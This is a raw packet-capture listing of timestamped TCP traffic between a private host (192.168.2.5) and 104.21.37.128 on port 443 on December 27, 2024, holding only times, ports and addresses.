Dec 27, 2024 20:25:02.466907024 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.466912985 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.503299952 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.503381014 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.503916025 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.503922939 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.504127026 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.507934093 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.514115095 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.515269041 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.515275002 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.515594006 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.523072004 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.523092031 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.523252010 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.527362108 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.527502060 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.531788111 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.531806946 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.531960964 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.540445089 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.540465117 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.540608883 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.549309015 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.549438000 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.549443007 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.549552917 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.554999113 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.555017948 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.555150986 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.558394909 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.558486938 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.558491945 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.558621883 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.564059019 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.564183950 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.570116043 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.570298910 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.573153019 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.573297977 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.578943968 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.584973097 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.585037947 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.585045099 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.586918116 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.702470064 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.702800035 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.706073999 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.706204891 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.708539009 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.708728075 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.713402033 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.713530064 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.717993021 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.718939066 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.720381975 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.722897053 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.725454092 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.726912975 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.730765104 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.730895042 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.732876062 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.734905958 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.737341881 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.738922119 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.741679907 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.742913008 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.743906975 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.746912956 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.748486042 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.750920057 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.752923965 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.754954100 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.755505085 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.758833885 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.758903980 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.758910894 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.758966923 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.763581038 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.763626099 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.763631105 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.766910076 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.768121958 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.770956039 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.772813082 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.774904013 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.775234938 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.778516054 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.779937983 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.782232046 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.782970905 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.782977104 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.790903091 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.790908098 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.842891932 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.905858040 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.905872107 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.906223059 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.908200979 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.908211946 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.908366919 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.911878109 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.911885977 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.912053108 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.915628910 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.915746927 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.927122116 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.927144051 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.927190065 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.927244902 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.927264929 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.927300930 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.927318096 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.927354097 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.927354097 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.940222025 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.940287113 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.940347910 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.940352917 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.940418959 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.942893028 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.949481010 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.949547052 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.949593067 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.949599028 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.949795008 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.962757111 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.962802887 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.962878942 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.962878942 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.962884903 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.975554943 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.975605011 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.975662947 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.975668907 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.975748062 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.986205101 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.986218929 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.986357927 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.986370087 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.999205112 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.999226093 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.999330044 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.999330044 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.999336004 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.046366930 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.110384941 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.110408068 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.110445023 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.110481977 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.110490084 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.110521078 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.121115923 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.121159077 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.121211052 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.121217966 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.121249914 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.130872011 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.130914927 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.130973101 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.130973101 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.130980015 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.140882015 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.140923023 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.140969992 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.140974998 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.141005993 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.142405987 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.142488003 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.142493963 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.142600060 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.145083904 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.145198107 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.154679060 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.154721022 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.154762983 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.154767990 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.154798985 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.164329052 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.164377928 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.164424896 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.164428949 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.164462090 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.173108101 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.173149109 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.173198938 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.173204899 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.173235893 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.181416035 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.181476116 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.181516886 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.181524038 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.181555033 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.181626081 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.340711117 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.343054056 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.348150015 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.348193884 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.348257065 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.348268986 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.348299980 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.356272936 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.356339931 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.356388092 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.356394053 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.356421947 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.363464117 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.363506079 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.363557100 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.363564014 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.363591909 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.371642113 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.371689081 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.371732950 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.371738911 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.371767998 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.380337000 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.380378962 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.380407095 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.380412102 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.380440950 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.388263941 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.388283968 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.388335943 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.388345003 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.388381004 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.396229029 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.396243095 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.396322012 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.396327972 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.450347900 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.542577028 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.542591095 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.542637110 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.542665958 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.542675018 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.542711973 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.542732000 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.550324917 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.550342083 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.550426006 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.550434113 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.550471067 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.557552099 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.557568073 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.557643890 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.557651043 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.557692051 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.559866905 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.559933901 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.568053007 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.568070889 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.568151951 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.568161011 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.574002028 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.574052095 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.574075937 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.574084997 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.574111938 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.574121952 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.581897020 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.581917048 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.581993103 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.582001925 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.582042933 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.589931965 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.589950085 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.590012074 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.590029001 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.590070963 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.597022057 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.597038031 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.597106934 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.597114086 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.597156048 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.599361897 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.774795055 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.774816990 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.774892092 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.774902105 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.774944067 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.782387018 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.782402039 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.782470942 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.782476902 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.782516956 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.790589094 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.790604115 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.790671110 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.790679932 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.790699959 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.790724039 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.797676086 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.797691107 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.797756910 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.797764063 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.797815084 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.805999041 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.806013107 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.806123018 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.806128979 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.806171894 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.813688993 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.813705921 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.813760042 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.813766003 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.813801050 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.813822985 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.819814920 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.821757078 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.821769953 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.821845055 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.821854115 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.821894884 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.829839945 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.829932928 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.829951048 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.830055952 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.830061913 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:03.830102921 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:03.831043959 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:04.000407934 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:04.000431061 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:04.000519991 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:04.000534058 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:04.000583887 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:04.008131027 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:04.008150101 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:04.008227110 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:04.008233070 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:04.008277893 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:04.016315937 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:04.016331911 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:04.016387939 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:04.016393900 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:04.016436100 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:04.023487091 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:04.023502111 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:04.023562908 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:04.023570061 CET	443	49810	104.21.37.128	192.168.2.5
